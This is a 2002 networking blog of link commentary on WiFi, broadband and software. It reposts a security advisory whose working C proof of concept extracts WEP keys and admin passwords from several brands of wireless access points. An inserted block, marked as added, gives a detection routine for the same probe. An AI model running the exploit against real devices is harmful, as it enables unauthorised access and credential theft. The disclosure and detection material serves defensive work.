The Blog




A juicy collection of links at The Unofficial 802.11 Security Web Page. Warning: this is heavy-duty stuff and probably way too much for the casual observer. [from: JB Wifi]

I don't like statements about the Internet that appear to state facts, because they are always generalizations and frequently just plain wrong. But this is quite a good one: The Internet exists to improve communication. Communities can grow anywhere communication occurs. From an excellent article, O'Reilly Network: Building Online Communities [Oct. 21, 2002] [from: JB Ecademy]

NTL to provide Virgin with broadband : NTL Business has secured a seven-figure deal to supply Virgin.net with wholesale broadband services. The company will provide Virgin.net with a complete virtual ISP, comprising broadband access, hosting, email, call centre support, billing and collection. The deal follows a six-year relationship between the two companies relating to the provision of narrowband services. Virgin.net last month launched its broadband service, retailing at under £25-a-month.

Question: Why isn't NTL required to open up its distribution points to third parties to allow them to supply broadband over the same final mile cable? One rule for BT, one rule for everyone else?

However, notwithstanding the cynicism inherent in that last comment, it's good to see NTL getting into the broadband wholesale business even at the risk of competing with itself. [from: JB Ecademy]

The Halloween documents are alleged to be yearly Microsoft internal memos on open source. Allegedly, they have fallen into the hands of the open source community and, not surprisingly, they then ended up on a website: Open Source Initiative OSI - Doc7:Halloween Documents. You should draw your own conclusions and obviously take the commentary on the documents with large pinches of salt. Unsurprisingly, both the commentary and the documents involved were written with strong and opposing viewpoints. [from: JB Ecademy]

Some comment on WPA Security.


--31 October 2002 WPA is New Wireless Standard
The Wireless Fidelity Alliance has released a new standard called Wi-Fi Protected Access (WPA). The standard will replace the easily broken security presently used by many wireless networks. WPA employs dynamic key encryption in the form of the Temporal Key Integrity Protocol (TKIP); WPA also provides improved network user authentication.
http://www.usatoday.com/tech/news/computersecurity/2002-10-31-wireless-security_x.htm
http://www.pcworld.com/news/article/0,aid,106530,00.asp
http://www.computerworld.com/securitytopics/security/story/0,10801,75533,00.html
http://news.com.com/2100-1033-964046.html

[Editor's Note (Shpantzer): Who will go to the trouble of implementing this temporary 'solution' only to replace it when 802.11i comes out? Ted Ipsen, from the Information Risk Management practice at KPMG LLP, says users should skip the WPA purchase altogether. Cisco put TKIP and its own proprietary implementation of EAP (Cisco LEAP) into their hardware about a year ago, and it's still only a stopgap measure. Layer 2 security should still be considered to be broken, even after WEP2 comes out next year. Ted always asks clients: "Do you rely on your CAT5 cable and your Ethernet switches to provide you with confidentiality, integrity and availability?" Use Layers 3 through 7 and architecture to defend your resources. (Ranum): How long will TKIP last? This is basically a layer of re-keying atop a broken cryptosystem. You can't build a castle on foundations of used chewing gum!]



So what this means in real terms is that you should use VPNs, SSL, POP3 and SMTP with SSL, and strong authentication, and encrypt any communications that you consider require secrecy, and you should do all of this as a matter of course. This is good practice anyway whenever Internet communication is involved. A side effect of doing this everywhere is that it reduces the reliance on the firewall to keep out intruders and implicitly recognises that there are security leaks everywhere.

It's also a damning comment on whoever it was that called WEP "Wired Equivalent Privacy". This was just never going to be possible. [from: JB Wifi]




Megabeam rolls out Euro WLAN network : Megabeam, the pan-European wireless Internet service provider, has set the pricing for its WLAN hotspot service for the first time. Subscriptions bought directly will start at €7.5 for two hours' access. Twenty-four hour access will cost €30 (approx. £19). As you can see from the pricing, Megabeam is targeting the business traveller only.

How sad. Another company targeting the business traveller with perceived deep pockets in order to fleece the early adopters and thereby pay for the capital costs. I know this makes business sense, but where is the cheapskate WISP that charges little or nothing? Surprise! They're only a short walk to the next block. [from: JB Wifi]

Wired News has a story about the guy who mapped WiFi for the whole of Manhattan (previously blogged here): N.Y., N.Y., It's a Wireless Town. [from: JB Wifi]

Dan Gillmor: Telecom strategy is take it or leave it Gillmor is talking about the USA, but his conclusions are applicable to Europe as well. He reasons that the solution to the price, slow rollout and monopoly control of broadband is first legislation to encourage public and private alternatives for the last mile problem and second to encourage Open Spectrum policies for Wireless. The second is particularly interesting. The success of WiFi is showing that particularly at high frequencies we can have an ordered exploitation of wireless spectrum without regulatory control over the allocation to providers and users. Technology is proving that spectrum doesn't have to be a scarce resource that must be carefully husbanded and so sold to the highest bidder. But I'm still not sure that it's an answer to Broadband provision at least in the short term. We don't yet have any good examples of WISPs (Wireless ISPs) being profitable or even reasonably successful. And all the current models still have high capital startup costs.

So to go back to the first point about public and private last mile investment. I find it ironic that the government of the day that first encouraged cable in the UK tried long and hard to get the cable companies to lay star-wired fibre. Sadly, this was too early in the Moore's law cycle and so prohibitively expensive at that time. But at least they did lay pipes in the road that would let them lay new wires relatively easily. Maybe we should be encouraging the cable companies to go back and offer a very high speed service as an alternative, but with their current debt situation I can't see this happening. [from: JB Wifi]

Something truly wonderful about this story.

Who will buy my personal data? Josh's friend Chris got hold of his marketing data under the Data Protection Act. Now he's selling it to the highest bidder on e-bay.
Lloyds TSB: Approximately 500 pages of personal data including an analysis of banking products they believe I might be interested in. Also includes overdraft limit maintenance history (hand written), risk management history data (93 pages) and a full list of letters sent over the previous 5 years (completed by hand). All data and codes come with explanatory notes provided by Lloyds TSB. Original cost UKP 10. Sainsbury's: Dated 12 July 2001, this data is split into five separate reports. Report 1. Operational report (name and address etc.) Report 2. Operational report again, with summarised details and the last 31 transactions on the card. Report 3. Drawn from the main data repository and includes the 'Acorn' standard marketing categorisation. Includes the assumption that we are 'better-off inner-city executives living in a partially gentrified multi-ethnic area'. Report 4. Shows the transactions made using our reward card. Report 5. This is a list of EVERYTHING we bought from Sainsbury's over a 3 year period - where we bought it and how much we paid. This data has been co-produced with my partner whose individual data has been removed.
[thanks, Oblomovka] [from: JB Ecademy]

Ecademy Launches WiFi Special Interest Group.

There'll be a more formal launch tonight, but the WiFi Special Interest Group is now live. This is a complete website in the style of the main Ecademy site which shares membership with the main site (and other SIGs). The focus is on WiFi and related wireless Internet access technologies such as GPRS, 3G, Bluetooth and such like.

As a member of Ecademy and like non-members you are automatically able to view the content. If you wish to post content, vote in polls and otherwise contribute you need to join the SIG. This is a one-click process. You'll see a link to Join in your menu on the left.

The SIG has been initially populated with blog and article entries from the main site that appear to be relevant. If you were the original author you may notice that these have disappeared from your blog on the main site and appeared in your blog on the WiFi site. You have automatically been given membership of the WiFi SIG.

Over the coming months we expect to launch a group of these SIGs on various topics. [from: JB Ecademy]




KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
Accesspoints disclose wep keys, password and mac filter

Date
----
2002-11-01


Description:
------------

GlobalSunTech develops Wireless Access Points for OEM customers like Linksys,
D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup
phase showed a security problem.

Sending a broadcast packet to UDP port 27155 containing the string "gstsearch"
causes the accesspoint to return wep keys, mac filter and admin password. This
happens on the WLAN Side and on the LAN Side.


Systems Affected
----------------
Vulnerable, tested, OEM Version from GlobalSunTech:
WISECOM GL2422AP-0T

Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
D-Link DWL-900AP+ B1 version 2.1 and 2.2
ALLOY GL-2422AP-S
EUSSO GL2422-AP
LINKSYS WAP11-V2.2


Proof of concept:
-----------------

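#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Leading fields of the reply, as decoded by the advisory's author */
typedef struct {
    char type[28];
    char name[32];
    char user[16];
    char pass[16];
}
__attribute__ ((packed)) answer;

int main()
{
    char rcvbuffer[1024];
    struct sockaddr_in sin;
    answer* ans = (answer *)rcvbuffer;
    int sd, ret, val;

    /* Broadcast destination, UDP port 27155 */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("255.255.255.255");
    sin.sin_port = htons(27155);

    sd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sd < 0)
    {
        perror("socket");
        exit(1);
    }

    /* Broadcast sends must be enabled explicitly on the socket */
    val = 1;
    ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val,
                     sizeof(val));
    if (ret < 0)
    {
        perror("setsockopt");
        exit(1);
    }

    ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin,
                 sizeof(sin));
    if (ret < 0)
    {
        perror("sendto");
        exit(1);
    }

    /* Zero the buffer and leave one spare byte so the fields stay terminated */
    memset(rcvbuffer, 0, sizeof(rcvbuffer));
    ret = read(sd, rcvbuffer, sizeof(rcvbuffer) - 1);
    if (ret < 0)
    {
        perror("read");
        exit(1);
    }

    printf("Type : %s\n", ans->type);
    printf("Announced Name : %s\n", ans->name);
    printf("Admin Username : %s\n", ans->user);
    printf("Admin Password : %s\n", ans->pass);

    return 0;
}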

Disclaimer
-----------

This advisory does not claim to be complete or to be usable for
any purpose. Especially information on the vulnerable systems may
be inaccurate or wrong. Possibly supplied exploit code is not to
be used for malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.

http://www.khamsin.ch
[from: JB Wifi]
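
A defender-side counterpart to the advisory above, as an added example that is not part of the original advisory or this blog: a C classifier that a sensor could run over raw IPv4 packets to flag the "gstsearch" probe on UDP port 27155. The function names, the verdict enum and the sample packets are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GST_PORT 27155                        /* UDP port named in the advisory */
static const char GST_PROBE[] = "gstsearch";  /* probe string named in the advisory */

/* Hypothetical verdicts for this example */
enum gst_verdict { GST_IGNORE, GST_MALFORMED, GST_PORT_HIT, GST_PROBE_HIT };

/* Classify one raw IPv4 packet (buffer starts at the IP header). */
enum gst_verdict gst_classify(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return GST_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;          /* IP header length in bytes */
    if (ihl < 20 || len < ihl) return GST_MALFORMED;
    if (pkt[9] != 17) return GST_IGNORE;               /* not UDP */
    if (len < ihl + 8) return GST_MALFORMED;           /* UDP header cut short */
    const uint8_t *udp = pkt + ihl;
    unsigned dport = (unsigned)udp[2] << 8 | udp[3];
    size_t ulen = (size_t)udp[4] << 8 | udp[5];        /* UDP header + payload */
    if (ulen < 8 || ulen > len - ihl) return GST_MALFORMED;  /* length field lies */
    if (dport != GST_PORT) return GST_IGNORE;
    /* The advisory says the packet "contains" the string, so scan the payload. */
    size_t plen = ulen - 8, n = sizeof(GST_PROBE) - 1;
    for (size_t i = 0; i + n <= plen; i++)
        if (memcmp(udp + 8 + i, GST_PROBE, n) == 0)
            return GST_PROBE_HIT;
    return GST_PORT_HIT;                               /* right port, other payload */
}

/* Build a constructed sample packet: minimal IPv4 + UDP headers around payload. */
size_t gst_sample(uint8_t *out, size_t cap, unsigned dport, const char *payload)
{
    size_t plen = strlen(payload), total = 28 + plen;
    if (total > cap) return 0;
    memset(out, 0, total);
    out[0] = 0x45;                                     /* IPv4, IHL = 5 words */
    out[2] = (uint8_t)(total >> 8); out[3] = (uint8_t)total;
    out[9] = 17;                                       /* protocol = UDP */
    out[22] = (uint8_t)(dport >> 8); out[23] = (uint8_t)dport;
    out[24] = (uint8_t)((8 + plen) >> 8); out[25] = (uint8_t)(8 + plen);
    memcpy(out + 28, payload, plen);
    return total;
}

int main(void)
{
    uint8_t buf[128];
    size_t n = gst_sample(buf, sizeof buf, GST_PORT, "gstsearch");
    printf("probe to port 27155 -> verdict %d\n", gst_classify(buf, n));
    n = gst_sample(buf, sizeof buf, 53, "gstsearch");
    printf("same payload to port 53 -> verdict %d\n", gst_classify(buf, n));
    return 0;
}
```

IP fragments and IPv6 are not handled here. A GST_PORT_HIT is worth logging on its own, since the advisory ties that port to the disclosure.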

Another security alert. Oh, the joys of embedded code.




Popular Linksys Router Vulnerable to Attack

A denial-of-service vulnerability in one of the most popular cable and DSL routers
allows an attacker to crash the router from a remote location.

The Linksys Group Inc.'s BEFSR41 EtherFast Cable/DSL Router with 4-Port Switch is
vulnerable to a remote DoS attack that requires the attacker to do nothing more
than access a specific script on the router's remote management interface. The
vulnerability affects all of the routers with firmware versions earlier than
1.42.7.

http://eletters1.ziffdavis.com/cgi-bin10/flo?y=eSkd0EXgz40DUm0ry20Ac [from: JB Wifi]

Slashdot | Building A Community Wireless Network From Scratch: unusually good comments from Slashdot. The main article, about community wireless in Bristol, can be found here. More comment later. [from: JB Wifi]




eWEEK - Print Article : Microsoft's Fitzgerald: Web Services Over the Hump Fitzgerald argues that the base Web Services protocols are now done and that the toolkits are in place to use them, so it's time to move into an implementation stage rather than sit there arguing about the protocols and approach. Something I wholeheartedly agree with.

Then he moves on to comparing the .NET environment with the Java environment. We get this, which again is probably true. "So we continue to focus on high-volume, low-cost, mass-market, ride-the-high-volume hardware. Gartner [Inc.] did a piece this year where they said 80 percent of the spending on Java application servers has been wasted—where people are just over-buying functionality that they don't need. The current environment, where budgets are tight and people are trying to do more with less, is really forcing people to rethink writing a big check for infrastructure." And at this point I begin to wonder exactly what Java is good for. It's making serious inroads into the embedded processor market such as cellphones, but in the server development market it doesn't feel like it's proved its point. There was a recent article about a speed comparison between Sun's reference application (The petshop store) in Java and an equivalent using other databases and platforms. One piece missing was a fully open source solution using something like Perl or Python with MySQL. I can't prove it, but I have this sneaking suspicion that it would have beaten the pants off all of them.

The thing I find delightfully subversive about Web Services is that the core protocols are implemented in every language you can imagine. If you want to mix .Net, Java, Weblogic, Websphere development and applications into a loosely coupled whole, you can. And if you want to bolt in systems based on Perl SOAP::Lite, Python, Apache Axis, PHP, you can do that too. And the same goes for C++, and Delphi. [from: JB Ecademy]




IM compatibility closer to reality - Tech News - CNET.com : The Internet Engineering Task Force (IETF), the group that sets the technical standards for the Internet, gave the go-ahead to the creators of open-source instant-messaging application Jabber to create a working group based on that technology. This will be known as Extensible Messaging and Presence Protocol (XMPP). So this joins the IBM-Microsoft promoted SIMPLE. The IETF approved SIMPLE as a proposed standard in September. Then we have AOL announcing that AIM and ICQ will interoperate. The fragmented IM market is coming together slowly, but there's still plenty of room for consolidation and interworking. [from: JB Ecademy]

For those of us who spent our youth listening to Dub Reggae, here's the >>INFINITE WHEEL<< Dub Selecta!




An amazing piece of scholarship pulling together a large number of independent surveys of the computer software market. Why Open Source Software / Free Software (OSS/FS)? Look at the Numbers! If you're trying to convince your boss to go with OSS/FS software, this would be a good report to wave at her. [from: JB Ecademy]

This story's actually about WPA but included are some stats from Gartner. ElectricNews.net:News:Wi-Fi Alliance toughens 802.11 security : According to research body Gartner Dataquest, worldwide wireless LAN shipments should increase by 73 percent in 2002, while revenue will increase 26 percent. Gartner predicts that by 2003, WLAN shipments will total 26.5 million units, up from 15.5 million units in 2002, while revenue will reach almost USD2.8 billion in 2003, compared to USD2.1 billion in 2002. Gartner analysts say the market will continue to experience healthy growth through to 2007.

So in very broad terms we have exponential growth in shipments, linear growth in revenue and falling profits. What seems to be happening is that falling prices due to competition are arriving earlier and earlier in the price curve, before the early adopters have paid off all the capital costs with the initial high prices. This is a new form of economics, isn't it?

I think I've seen some other figures that suggest that Wireless ethernet shipments are now 30% of all ethernet shipments but I can't confirm that. [from: JB Wifi]

WLAN Hot Spot Access For 3G Ericsson announces strategic partnerships to speed up market take-off for public WLAN. Ericsson chooses Agere and Proxim to jointly develop and supply telecom operators with complete end-to-end solutions for WLAN (Wi-Fi) access, integrating hot spot access with mobile 2G and 3G networks. [thanks, CYBERFROST.net]

On the surface this looks like a great idea. But for it to work, we'll need mass shipments of client hardware that supports it. Imagine a new PCMCIA card that does 802.11a+b as well as GSM and/or CDMA with identification and authentication via a standard cellphone SIM. We'd then be able to fire up the laptop and get access anywhere with the software and card choosing the highest speed available. It ought to be possible to choose an appropriate voice channel as well, VoIP if it's available, dropping back to cell if not. But like I said, to do this, we have to have a high installed base of these cards and we also have to have the same sort of roaming and cross charging arrangements that we currently have with cellphone operators. Meanwhile the WLAN industry is churning out .11b and now .11a cards without all this. The operators won't have the same stranglehold over the technology that they enjoyed with cellphones during the 90s. [from: JB Wifi]
